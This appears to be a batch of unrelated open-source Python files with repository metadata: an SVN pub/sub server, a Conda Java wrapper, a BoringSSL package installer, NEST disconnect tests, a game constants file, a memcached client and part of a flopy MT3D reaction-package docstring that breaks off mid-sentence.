# If the type is included in the URL, you will only get commits of that type.
# The type can be * and then you will receive commits of any type.
#
# If the repository is included in the URL, you will only receive
# messages about that repository. The repository can be * and then you
# will receive messages about all repositories.
#
# Example Pub clients:
# curl -T revinfo.json -i http://127.0.0.1:2069/commits
#
# TODO:
# - Add Real access controls (not just 127.0.0.1)
# - Document PUT format
# - Convert to twisted.python.log
try:
import simplejson as json
except ImportError:
import json
import sys
import twisted
from twisted.internet import reactor
from twisted.internet import defer
from twisted.web import server
from twisted.web import resource
from twisted.python import log
import time
class Commit:
def __init__(self, r):
self.__dict__.update(r)
if not self.check_value('repository'):
raise ValueError('Invalid Repository Value')
if not self.check_value('type'):
raise ValueError('Invalid Type Value')
if not self.check_value('format'):
raise ValueError('Invalid Format Value')
if not self.check_value('id'):
raise ValueError('Invalid ID Value')
def check_value(self, k):
return hasattr(self, k) and self.__dict__[k]
def render_commit(self):
obj = {'commit': {}}
obj['commit'].update(self.__dict__)
return json.dumps(obj)
def render_log(self):
try:
paths_changed = " %d paths changed" % len(self.changed)
except:
paths_changed = ""
return "%s:%s repo '%s' id '%s'%s" % (self.type,
self.format,
self.repository,
self.id,
paths_changed)
HEARTBEAT_TIME = 15
class Client(object):
def __init__(self, pubsub, r, type, repository):
self.pubsub = pubsub
r.notifyFinish().addErrback(self.finished)
self.r = r
self.type = type
self.repository = repository
self.alive = True
log.msg("OPEN: %s:%d (%d clients online)"% (r.getClientIP(), r.client.port, pubsub.cc()+1))
def finished(self, reason):
self.alive = False
log.msg("CLOSE: %s:%d (%d clients online)"% (self.r.getClientIP(), self.r.client.port, self.pubsub.cc()))
try:
self.pubsub.remove(self)
except ValueError:
pass
def interested_in(self, commit):
if self.type and self.type != commit.type:
return False
if self.repository and self.repository != commit.repository:
return False
return True
def notify(self, data):
self.write(data)
def start(self):
self.write_start()
reactor.callLater(HEARTBEAT_TIME, self.heartbeat, None)
def heartbeat(self, args):
if self.alive:
self.write_heartbeat()
reactor.callLater(HEARTBEAT_TIME, self.heartbeat, None)
def write_data(self, data):
self.write(data + "\n\0")
""" "Data must not be unicode" is what the interfaces.ITransport says... grr. """
def write(self, input):
self.r.write(str(input))
def write_start(self):
self.r.setHeader('X-SVNPubSub-Version', '1')
self.r.setHeader('content-type', 'application/vnd.apache.vc-notify+json')
self.write('{"svnpubsub": {"version": 1}}\n\0')
def write_heartbeat(self):
self.write(json.dumps({"stillalive": time.time()}) + "\n\0")
class SvnPubSub(resource.Resource):
isLeaf = True
clients = []
def cc(self):
return len(self.clients)
def remove(self, c):
self.clients.remove(c)
def render_GET(self, request):
log.msg("REQUEST: %s" % (request.uri))
request.setHeader('content-type', 'text/plain')
repository = None
type = None
uri = request.uri.split('/')
uri_len = len(uri)
if uri_len < 2 or uri_len > 4:
request.setResponseCode(400)
return "Invalid path\n"
if uri_len >= 3:
type = uri[2]
if uri_len == 4:
repository = uri[3]
# Convert wild card to None.
if type == '*':
type = None
if repository == '*':
repository = None
c = Client(self, request, type, repository)
self.clients.append(c)
c.start()
return twisted.web.server.NOT_DONE_YET
def notifyAll(self, commit):
data = commit.render_commit()
log.msg("COMMIT: %s (%d clients)" % (commit.render_log(), self.cc()))
for client in self.clients:
if client.interested_in(commit):
client.write_data(data)
def render_PUT(self, request):
request.setHeader('content-type', 'text/plain')
ip = request.getClientIP()
if ip != "127.0.0.1":
request.setResponseCode(401)
return "Access Denied"
input = request.content.read()
#import pdb;pdb.set_trace()
#print "input: %s" % (input)
try:
c = json.loads(input)
commit = Commit(c)
except ValueError as e:
request.setResponseCode(400)
log.msg("COMMIT: failed due to: %s" % str(e))
return str(e)
self.notifyAll(commit)
return "Ok"
def svnpubsub_server():
root = resource.Resource()
s = SvnPubSub()
root.putChild("commits", s)
return server.Site(root)
if __name__ == "__main__":
log.startLogging(sys.stdout)
# Port 2069 "HTTP Event Port", whatever, sounds good to me
reactor.listenTCP(2069, svnpubsub_server())
reactor.run()
| centic9/subversion-ppa | tools/server-side/svnpubsub/svnpubsub/server.py | Python | apache-2.0 | 7,427 |
#!/usr/bin/env python
#
# Wrapper script for Java Conda packages that ensures that the java runtime
# is invoked with the right options. Adapted from the bash script (http://stackoverflow.com/questions/59895/can-a-bash-script-tell-what-directory-its-stored-in/246128#246128).
#
# Program Parameters
#
import os
import subprocess
import sys
from os import access
from os import getenv
from os import X_OK
jar_file = 'SearchGUI-2.1.4.jar'
default_jvm_mem_opts = ['-Xms512m', '-Xmx1g']
# !!! End of parameter section. No user-serviceable code below this line !!!
def real_dirname(path):
"""Return the symlink-resolved, canonicalized directory-portion of path."""
return os.path.dirname(os.path.realpath(path))
def java_executable():
"""Return the executable name of the Java interpreter."""
java_home = getenv('JAVA_HOME')
java_bin = os.path.join('bin', 'java')
if java_home and access(os.path.join(java_home, java_bin), X_OK):
return os.path.join(java_home, java_bin)
else:
return 'java'
def jvm_opts(argv):
"""Construct list of Java arguments based on our argument list.
The argument list passed in argv must not include the script name.
The return value is a 3-tuple lists of strings of the form:
(memory_options, prop_options, passthrough_options)
"""
mem_opts = []
prop_opts = []
pass_args = []
for arg in argv:
if arg.startswith('-D'):
prop_opts.append(arg)
elif arg.startswith('-XX'):
prop_opts.append(arg)
elif arg.startswith('-Xm'):
mem_opts.append(arg)
else:
pass_args.append(arg)
# In the original shell script the test coded below read:
# if [ "$jvm_mem_opts" == "" ] && [ -z ${_JAVA_OPTIONS+x} ]
# To reproduce the behaviour of the above shell code fragment
# it is important to explictly check for equality with None
# in the second condition, so a null envar value counts as True!
if mem_opts == [] and getenv('_JAVA_OPTIONS') is None:
mem_opts = default_jvm_mem_opts
return (mem_opts, prop_opts, pass_args)
def main():
java = java_executable()
jar_dir = real_dirname(sys.argv[0])
(mem_opts, prop_opts, pass_args) = jvm_opts(sys.argv[1:])
if pass_args != [] and pass_args[0].startswith('eu'):
jar_arg = '-cp'
else:
jar_arg = '-jar'
jar_path = os.path.join(jar_dir, jar_file)
java_args = [java] + mem_opts + prop_opts + [jar_arg] + [jar_path] + pass_args
sys.exit(subprocess.call(java_args))
if __name__ == '__main__':
main()
| zwanli/bioconda-recipes | recipes/searchgui/2.1.4/searchgui.py | Python | mit | 2,612 |
# Copyright 2021 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Install and check status of BoringSSL + Chromium verifier."""
import os
import pathlib
import subprocess
from typing import Sequence
import pw_package.git_repo
import pw_package.package_manager
def boringssl_repo_path(path: pathlib.Path) -> pathlib.Path:
return path / 'src'
class BoringSSL(pw_package.package_manager.Package):
"""Install and check status of BoringSSL and chromium verifier."""
def __init__(self, *args, **kwargs):
super().__init__(*args, name='boringssl', **kwargs)
self._boringssl = pw_package.git_repo.GitRepo(
name='boringssl',
url=''.join([
'https://pigweed.googlesource.com',
'/third_party/boringssl/boringssl'
]),
commit='9f55d972854d0b34dae39c7cd3679d6ada3dfd5b')
def status(self, path: pathlib.Path) -> bool:
if not self._boringssl.status(boringssl_repo_path(path)):
return False
# Check that necessary build files are generated.
build_files = ['BUILD.generated.gni', 'err_data.c']
return all(os.path.exists(path / file) for file in build_files)
def install(self, path: pathlib.Path) -> None:
# Checkout the library
repo_path = boringssl_repo_path(path)
self._boringssl.install(repo_path)
# BoringSSL provides a src/util/generate_build_files.py script for
# generating build files. Call the script after checkout so that
# our .gn build script can pick them up.
script = repo_path / 'util' / 'generate_build_files.py'
if not os.path.exists(script):
raise FileNotFoundError('Fail to find generate_build_files.py')
subprocess.run(['python', script, 'gn'], cwd=path)
# TODO(zyecheng): Add install logic for chromium certificate verifier.
def info(self, path: pathlib.Path) -> Sequence[str]:
return (
f'{self.name} installed in: {path}',
'Enable by running "gn args out" and adding this line:',
f' dir_pw_third_party_boringssl = "{path}"',
)
pw_package.package_manager.register(BoringSSL)
| google/pigweed | pw_package/py/pw_package/packages/boringssl.py | Python | apache-2.0 | 2,720 |
# -*- coding: utf-8 -*-
"""
<DefineSource>
@Date : Fri Nov 14 13:20:38 2014 \n
@Author : Erwan Ledoux \n\n
</DefineSource>
A Concluder
"""
#<DefineAugmentation>
import ShareYourSystem as SYS
BaseModuleStr="ShareYourSystem.Standards.Objects.Conditioner"
DecorationModuleStr="ShareYourSystem.Standards.Classors.Tester"
SYS.setSubModule(globals())
#</DefineAugmentation>
#<ImportSpecificModules>
#</ImportSpecificModules>
#<DefineClass>
@DecorationClass()
class ConcluderClass(BaseClass):
#Definition
RepresentingKeyStrsList=[
'ConcludingTestVariable',
'ConcludingConditionTuplesList',
'ConcludingTypesList',
'ConcludedConditionIsBoolsList',
'ConcludedIsBool'
]
def default_init(self,
_ConcludingTestVariable=None,
_ConcludingConditionTuplesList=None,
_ConcludingTypesList=[type(len),type(type)],
_ConcludedConditionIsBoolsList=None,
_ConcludedIsBool=True,
**_KwargVariablesDict
):
#Call the parent init method
BaseClass.__init__(self,**_KwargVariablesDict)
def do_conclude(self):
""" """
#debug
'''
self.debug(('self.',self,['ConcludingConditionTuplesList']))
'''
#map condition
self.ConcludedConditionIsBoolsList=map(
lambda __ConcludingConditionTuple:
self.condition(
__ConcludingConditionTuple[0],
__ConcludingConditionTuple[1],
__ConcludingConditionTuple[2],
self.ConcludingTestVariable
).ConditionedIsBool,
self.ConcludingConditionTuplesList
)
#all
self.ConcludedIsBool=all(self.ConcludedConditionIsBoolsList)
#</DefineClass>
| Ledoux/ShareYourSystem | Pythonlogy/draft/Concluder/__init__.py | Python | mit | 1,598 |
from dream.core.tests.models import *
| alumarcu/dream-framework | dream/core/tests/__init__.py | Python | gpl-3.0 | 38 |
#!/usr/bin/env python3.2
#
# Copyright (c) Net24 Limited, Christchurch, New Zealand 2011-2012
# and Voyager Internet Ltd, New Zealand, 2012-2013
#
# This file is part of py-magcode-core.
#
# Py-magcode-core is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Py-magcode-core is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with py-magcode-core. If not, see <http://www.gnu.org/licenses/>.
#
"""
Zone instance copying using internal python data structures Mix in class to modularise ZI classes.
"""
from magcode.core.globals_ import *
from magcode.core.database import *
from dms.dns import RRTYPE_A
from dms.dns import RRTYPE_AAAA
class ZiCopy(object):
"""
Contains methods for ZI copying via internal structures
"""
def copy(self, db_session, change_by=None):
"""
Copy ZI
First initialise base ZI, coppy comment structure set up,
then add records.
"""
ZoneInstance = sql_types['ZoneInstance']
RRComment = sql_types['RRComment']
# Keep previous change_by if it is not being changed. This is useful
# for auto PTR updates
if not change_by:
change_by = self.change_by
new_zi = ZoneInstance(zone_id=self.zone_id, soa_serial=self.soa_serial,
soa_mname=self.soa_mname, soa_rname=self.soa_rname,
soa_refresh=self.soa_refresh, soa_retry=self.soa_retry,
soa_expire=self.soa_expire, soa_minimum=self.soa_minimum,
soa_ttl=self.soa_ttl, zone_ttl=self.zone_ttl,
change_by=change_by)
db_session.add(new_zi)
new_zi.zone = self.zone
# Establish Apex comment, which is a special RR_Groups comment
# This dict establishes relN between new group comment and old one
# by indexing the new comment against the old comments id
rr_group_comments = {}
if self.apex_comment:
new_apex_comment = RRComment(comment=self.apex_comment.comment,
tag=self.apex_comment.tag)
db_session.add(new_apex_comment)
new_zi.apex_comment = new_apex_comment
rr_group_comments[self.apex_comment.id_] = new_apex_comment
# Establish rest of RR_Groups comments
for comment in self.rr_group_comments:
if self.apex_comment and comment is self.apex_comment:
# Apex comment is already done above here
continue
new_comment = RRComment(comment=comment.comment, tag=comment.tag)
db_session.add(new_comment)
rr_group_comments[comment.id_] = new_comment
# For the sake of making code clearer, do same for RR_Comments as
# for group comments
rr_comments = {}
for comment in self.rr_comments:
new_comment = RRComment(comment=comment.comment, tag=comment.tag)
db_session.add(new_comment)
rr_comments[comment.id_] = new_comment
# Walk zi RRs, and copy them as we go
for rr in self.rrs:
rr_type = sql_types[type(rr).__name__]
new_rr = rr_type(label=rr.label, domain=self.zone.name,
ttl=rr.ttl, zone_ttl=rr.zone_ttl,
rdata=rr.rdata, lock_ptr=rr.lock_ptr, disable=rr.disable,
track_reverse=rr.track_reverse)
db_session.add(new_rr)
new_zi.rrs.append(new_rr)
if rr_group_comments.get(rr.comment_group_id):
rr_group_comment = rr_group_comments[rr.comment_group_id]
new_rr.group_comment = rr_group_comment
# Uncomment if above is not 'taking'
# rr_group_comment.rr_group.append(new_rr)
if rr_comments.get(rr.comment_rr_id):
rr_comment = rr_comments[rr.comment_rr_id]
new_rr.rr_comment = rr_comment
# Uncomment if above is not 'taking'
# rr_comment.rr = new_rr
if hasattr(rr, 'reference') and rr.reference:
# Done this way as relationship is 'loose',
# SA relN is 'viewonly=True'
new_rr.ref_id = rr.ref_id
# Flush to DB to fill in record IDs
db_session.flush()
return new_zi
def get_auto_ptr_data(self, zone_sm):
"""
Return auto_ptr_data for the zi
"""
auto_ptr_data = []
zone_ref = zone_sm.reference
zone_ref_str = zone_ref.reference if zone_ref else None
for rr in self.rrs:
if rr.type_ not in (RRTYPE_A, RRTYPE_AAAA):
continue
# Use the dnspython rewritten rdata to make sure that IPv6
# addresses are uniquely written.
hostname = rr.label + '.' + zone_sm.name \
if rr.label != '@' else zone_sm.name
disable = rr.disable
auto_ptr_data.append({ 'address': rr.rdata,
'disable': disable,
'force_reverse': False,
'hostname': hostname,
'reference': zone_ref_str})
return auto_ptr_data
| onlinepcwizard/dms | dms/database/zi_copy.py | Python | gpl-3.0 | 5,748 |
# -*- coding: utf-8 -*-
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).
from . import test_delivery_auto_refresh
| OCA/carrier-delivery | delivery_auto_refresh/tests/__init__.py | Python | agpl-3.0 | 131 |
# -*- coding: utf-8 -*-
#
# test_disconnect.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
import nest
import unittest
import numpy as np
__author__ = 'naveau'
try:
from mpi4py import MPI
except ImportError:
# Test without MPI
mpi_test = 0
else:
# Test with MPI
mpi_test = 1
mpi_test = nest.sli_func("statusdict/have_mpi ::") & mpi_test
class TestDisconnectSingle(unittest.TestCase):
def setUp(self):
nest.ResetKernel()
nest.set_verbosity('M_ERROR')
self.num_procs = 1
if mpi_test:
self.comm = MPI.COMM_WORLD
self.rank = self.comm.Get_rank()
assert(nest.Rank() == self.rank)
self.num_procs = 2
self.exclude_synapse_model = [
'stdp_dopamine_synapse',
'stdp_dopamine_synapse_lbl',
'stdp_dopamine_synapse_hpc',
'stdp_dopamine_synapse_hpc_lbl',
'rate_connection_instantaneous',
'rate_connection_instantaneous_lbl',
'rate_connection_delayed',
'rate_connection_delayed_lbl',
'gap_junction',
'gap_junction_lbl',
'diffusion_connection',
'diffusion_connection_lbl',
]
def test_synapse_deletion_one_to_one_no_sp(self):
for syn_model in nest.Models('synapses'):
if syn_model not in self.exclude_synapse_model:
nest.ResetKernel()
print(syn_model)
nest.SetKernelStatus(
{
'resolution': 0.1,
'total_num_virtual_procs': self.num_procs
}
)
neurons = nest.Create('iaf_psc_alpha', 4)
syn_dict = {'model': syn_model}
nest.Connect([neurons[0]], [neurons[2]],
"one_to_one", syn_dict)
nest.Connect([neurons[1]], [neurons[3]],
"one_to_one", syn_dict)
# Delete existent connection
conns = nest.GetConnections(
[neurons[0]], [neurons[2]], syn_model)
if mpi_test:
conns = self.comm.allgather(conns)
conns = filter(None, conns)
assert len(list(conns)) == 1
nest.DisconnectOneToOne(neurons[0], neurons[2], syn_dict)
conns = nest.GetConnections(
[neurons[0]], [neurons[2]], syn_model)
if mpi_test:
conns = self.comm.allgather(conns)
conns = filter(None, conns)
assert len(list(conns)) == 0
# Assert that one can not delete a non existent connection
conns1 = nest.GetConnections(
[neurons[0]], [neurons[1]], syn_model)
if mpi_test:
conns1 = self.comm.allgather(conns1)
conns1 = filter(None, conns1)
assert len(list(conns1)) == 0
try:
nest.DisconnectOneToOne(neurons[0], neurons[1], syn_dict)
assert False
except nest.NESTError:
print("Synapse deletion ok: " + syn_model)
def suite():
test_suite = unittest.makeSuite(TestDisconnectSingle, 'test')
return test_suite
if __name__ == '__main__':
unittest.main()
| apeyser/nest-simulator | pynest/nest/tests/test_sp/test_disconnect.py | Python | gpl-2.0 | 4,073 |
from __future__ import division, print_function, unicode_literals
from tech_const import *
screen_scale = 2
tile_names = ['floor', 'lava', 'wall', 'treasure', 'orc_weak', 'orc_strong', 'smoke',
'fly_weak', 'fly_strong']
hero_stat = ['health', 'int', 'exp']
heroes = ['wizard', 'priest', 'warrior', 'rogue']
ExpNeed = [0, 30, 70, 120, 180]
maxlvl = 5
exp_per_tile = 100
luck_per_tile = 40
lava_damage = 20
Tech_stat = {
'wizard': {'speed': 1, 'maxhp': 100, 'attack': 30, 'armor': 30},
'priest': {'speed': 1, 'maxhp': 100, 'attack': 30, 'armor': 30},
'warrior': {'speed': 1, 'maxhp': 140, 'attack': 30, 'armor': 30},
'rogue': {'speed': 2, 'maxhp': 80, 'attack': 30, 'armor': 30}
}
Artefacts = ['mage_wand', 'aqua_shield', 'bandit_sword',
'black_mask', 'crystal_dagger', 'frost_staff',
'glory_cloak', 'katana_sword', 'mage_hat',
'priest_robe', 'redking_amulet', 'redking_belt',
'redking_hat', 'rogue_knife', 'royal_ring',
'sharp_ring', 'speed_boots', 'holy_wand',
'redking_boots', 'flame_sword']
Skills = ['warrior_1', 'wizard_1', 'priest_1', 'rogue_1',
'rogue_2']
Wizard_skills = [('wizard_1', 0)]
Priest_skills = [('priest_1', 0)]
Warrior_skills = [('warrior_1', 0)]
Rogue_skills = [('rogue_1', 0), ('rogue_2', 1)]
Hero_skills = {'wizard': Wizard_skills, 'priest' : Priest_skills, 'warrior': Warrior_skills, 'rogue': Rogue_skills}
Traps = ['lava']
Monsters = ['orc', 'fly']
Magic = ['curse']
Walls = ['wall', 'floor']
Object_list = {'trap': Traps, 'monster': Monsters, 'magic': Magic, 'wall': Walls}
Cost_list = {'lava': 100, 'orc': 200, 'fly' :250, 'wall': 100, 'floor': 0,'curse': 500}
Moneyperturn = 200
starting_money = 1000
Art_wizard_1 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_wizard_2 = ['sharp_ring', 'holy_wand', 'royal_ring', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_wizard_3 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_wizard_4 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_wizard_5 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_priest_1 = ['speed_boots', 'glory_cloak', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_priest_2 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_priest_3 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_priest_4 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_priest_5 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_warrior_1 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_warrior_2 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_warrior_3 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_warrior_4 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_warrior_5 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_rogue_1 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_rogue_2 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_rogue_3 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_rogue_4 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_rogue_5 = ['aqua_shield', 'flame_sword', 'katana_sword', 'bandit_sword', 'mage_hat', 'frost_staff']
Art_wizard = {1 : Art_wizard_1, 2 : Art_wizard_2, 3 : Art_wizard_3, 4 : Art_wizard_4, 5 : Art_wizard_5}
Art_priest = {1 : Art_priest_1, 2 : Art_priest_2, 3 : Art_priest_3, 4 : Art_priest_4, 5 : Art_priest_5}
Art_warrior = {1 : Art_warrior_1, 2 : Art_warrior_2, 3 : Art_warrior_3, 4 : Art_warrior_4, 5 : Art_warrior_5}
Art_rogue = {1 : Art_rogue_1, 2 : Art_rogue_2, 3 : Art_rogue_3, 4 : Art_rogue_4, 5 : Art_rogue_5}
Art_menu = {'wizard': Art_wizard, 'priest': Art_priest, 'warrior': Art_warrior, 'rogue': Art_rogue} | PFML239/Dungeon-defenders | const.py | Python | mit | 4,310 |
import six
import logging
from driver.connection import Connection
from driver.exceptions import *
from driver.protocol import *
log = logging.getLogger(__name__)
class Client(object):
""" Memcached client implementation with simple get and set methods
Args:
server: Connection parameters
Provides socket and protocol implementation for get and set commands.
To leverage parallel execution use ClientPool class.
"""
def __init__(self, server):
self._server = server
self._connection = Connection(server)
def connect(self):
"""
Open socket connection to memcached instance
"""
return self._connection.open()
def disconnect(self):
"""
Close socket connection to memcached instance
"""
self._connection.close()
def get(self, key):
"""
Executes get command
:param key: Key of the value to get
:return: Value for given key
"""
if not self._connection.socket:
self._connection.open()
command = b'get' +\
b' ' + _encode(key) +\
Constants.END_LINE
try:
self._connection.send(command)
except Exception as ex:
log.error("Command failed: %s" % str(command), ex)
self._connection.close()
return None
try:
response = self._connection.read()
except Exception as ex:
log.error("Failed to read response from socket", ex)
self._connection.close()
return None
log.debug("Received from socket: %s" % response)
result = _parse_get_response(response)
_check_for_errors(result[0])
if len(result) > 2:
return result[1]
raise DriverUnknownException(
"Received unexpected response from the memcached instance %s" % str(result))
def set(self, key, value, expire=0, noreply=True):
"""
Executes set command
:param key: Key of the value to set
:param value: String value
:param expire: Expire time with default value of never (0)
:param noreply: Indicates if client should wait for response
:return: Returns indication of a successful write
Set method execution time can benefit from skipping wait for reply
"""
if not self._connection.socket:
self._connection.open()
if not isinstance(value, six.binary_type):
try:
value = _encode(value)
except UnicodeEncodeError as e:
raise DriverConversionException(
"Failed to convert value to binary with exception: %s" % str(e))
flags = 0
arguments = b''
if noreply:
arguments += b' noreply'
if expire > Constants.MAXIMUM_TTL:
log.info("Using a value of TTL larger than max ttl. \
The value provided will be converted into unix timestamp for ttl timeout")
command = b'set' +\
b' ' + _encode(key) +\
b' ' + _encode(flags) +\
b' ' + _encode(expire) +\
b' ' + _encode(len(value)) +\
arguments + Constants.END_LINE +\
value + Constants.END_LINE
try:
self._connection.send(command)
except Exception as ex:
log.error("Command failed: %s" % str(command), ex)
self._connection.close()
return False
if noreply:
return True
try:
response = self._connection.read()
except Exception as ex:
log.error("Failed to read response from socket", ex)
self._connection.close()
return False
result = response.rstrip(Constants.END_LINE).split(Constants.END_LINE)
log.debug("Received from socket: %s" % response)
if result[0] == StoreReply.STORED:
log.debug("Successfully stored data")
return True
elif result[0] == StoreReply.EXISTS:
log.debug("Entry already exists")
return False
elif result[0] == StoreReply.NOT_STORED:
log.warn("Entry not stored for some reason")
return False
elif result[0] == StoreReply.NOT_FOUND:
log.warn("Received not found response")
return False
_check_for_errors(result[0])
raise DriverUnknownException(
"Received unexpected response from the memcached instance %s" % str(response))
def _encode(data):
return six.text_type(data).encode('ascii')
def _parse_get_response(response):
return response.split(Constants.END_LINE)
def _check_for_errors(result):
if result == Errors.ERROR:
message = "Received error response"
log.error(message)
raise DriverUnknownException(message)
elif result.startswith(Errors.SERVER_ERROR):
message = "Received server error with message: %s" % result[result.find(b' ') + 1:].decode("utf-8")
log.error(message)
raise DriverServerException(message)
elif result.startswith(Errors.CLIENT_ERROR):
message = "Received client error with message: %s" % result[result.find(b' ') + 1:].decode("utf-8")
log.error(message)
raise DriverClientException(message)
| mgobec/python-memcached | driver/client.py | Python | apache-2.0 | 5,424 |
import sys
import numpy as np
from ..pakbase import Package
from ..utils import Util3d
class Mt3dRct(Package):
"""
Chemical reaction package class.
Parameters
----------
model : model object
The model object (of type :class:`flopy.mt3dms.mt.Mt3dms`) to which
this package will be added.
isothm : int
isothm is a flag indicating which type of sorption (or dual-domain mass
transfer) is simulated: isothm = 0, no sorption is simulated;
isothm = 1, linear isotherm (equilibrium-controlled); isothm = 2,
Freundlich isotherm (equilibrium-controlled); isothm = 3, Langmuir
isotherm (equilibrium-controlled); isothm = 4, first-order kinetic
sorption (nonequilibrium); isothm = 5, dual-domain mass transfer
(without sorption); isothm = 6, dual-domain mass transfer
(with sorption). (default is 0).
ireact : int
ireact is a flag indicating which type of kinetic rate reaction is
simulated: ireact = 0, no kinetic rate reaction is simulated;
ireact = 1, first-order irreversible reaction. Note that this reaction
package is not intended for modeling chemical reactions between
species. An add-on reaction package developed specifically for that
purpose may be used. (default is 0).
igetsc : int
igetsc is an integer flag indicating whether the initial concentration
for the nonequilibrium sorbed or immobile phase of all species should
be read when nonequilibrium sorption (isothm = 4) or dual-domain mass
transfer (isothm = 5 or 6) is simulated: igetsc = 0, the initial
concentration for the sorbed or immobile phase is not read. By default,
the sorbed phase is assumed to be in equilibrium with the dissolved
phase (isothm = 4), and the immobile domain is assumed to have zero
concentration (isothm = 5 or 6). igetsc > 0, the initial concentration
for the sorbed phase or immobile liquid phase of all species will be
read. (default is 1).
rhob : float or array of floats (nlay, nrow, ncol)
rhob is the bulk density of the aquifer medium (unit, ML-3). rhob is
used if isothm = 1, 2, 3, 4, or 6. If rhob is not user-specified and
isothem is not 5 then rhob is set to 1.8e3. (default is None)
prsity2 : float or array of floats (nlay, nrow, ncol)
prsity2 is the porosity of the immobile domain (the ratio of pore
spaces filled with immobile fluids over the bulk volume of the aquifer
medium) when the simulation is intended to represent a dual-domain
system. prsity2 is used if isothm = 5 or 6. If prsity2 is not user-
specified and isothm = 5 or 6 then prsity2 is set to 0.1.
(default is None)
srconc : float or array of floats (nlay, nrow, ncol)
srconc is the user-specified initial concentration for the sorbed phase
of the first species if isothm = 4 (unit, MM-1). Note that for
equilibrium-controlled sorption, the initial concentration for the
sorbed phase cannot be specified. srconc is the user-specified initial
concentration of the first species for the immobile liquid phase if
isothm = 5 or 6 (unit, ML-3). If srconc is not user-specified and
isothm = 4, 5, or 6 then srconc is set to 0. (default is None).
sp1 : float or array of floats (nlay, nrow, ncol)
sp1 is the first sorption parameter for the first species. The use of
sp1 depends on the type of sorption selected (the value of isothm).
For linear sorption (isothm = 1) and nonequilibrium sorption (isothm =
4), sp1 is the distribution coefficient (Kd) (unit, L3M-1). For
Freundlich sorption (isothm = 2), sp1 is the Freundlich equilibrium
constant (Kf) (the unit depends on the Freundlich exponent a). For
Langmuir sorption (isothm = 3), sp1 is the Langmuir equilibrium
constant (Kl) (unit, L3M-1 ). For dual-domain mass transfer without
sorption (isothm = 5), sp1 is not used, but still must be entered. For
dual-domain mass transfer with sorption (isothm = 6), sp1 is also the
distribution coefficient (Kd) (unit, L3M-1). If sp1 is not specified
and isothm > 0 then sp1 is set to 0. (default is None).
sp2 : float or array of floats (nlay, nrow, ncol)
sp2 is the second sorption or dual-domain model parameter for the first
species. The use of sp2 depends on the type of sorption or dual-domain
model selected. For linear sorption (isothm = 1), sp2 is read but not
used. For Freundlich sorption (isothm = 2), sp2 is the Freundlich
exponent a. For Langmuir sorption (isothm = 3), sp2 is the total
concentration of the sorption sites available ( S ) (unit, MM-1). For
nonequilibrium sorption (isothm = 4), sp2 is the first-order mass
transfer rate between the dissolved and sorbed phases (unit, T-1). For
dual-domain mass transfer (isothm = 5 or 6), sp2 is the first-order
mass transfer rate between the two domains (unit, T-1). If sp2 is not
specified and isothm > 0 then sp2 is set to 0. (default is None).
rc1 : float or array of floats (nlay, nrow, ncol)
rc1 is the first-order reaction rate for the dissolved (liquid) phase
for the first species (unit, T-1). rc1 is not used ireact = 0. If a
dual-domain system is simulated, the reaction rates for the liquid
phase in the mobile and immobile domains are assumed to be equal. If
rc1 is not specified and ireact > 0 then rc1 is set to 0.
(default is None).
rc2 : float or array of floats (nlay, nrow, ncol)
rc2 is the first-order reaction rate for the sorbed phase for the first
species (unit, T-1). rc2 is not used ireact = 0. If a dual-domain
system is simulated, the reaction rates for the sorbed phase in the
mobile and immobile domains are assumed to be equal. Generally, if the
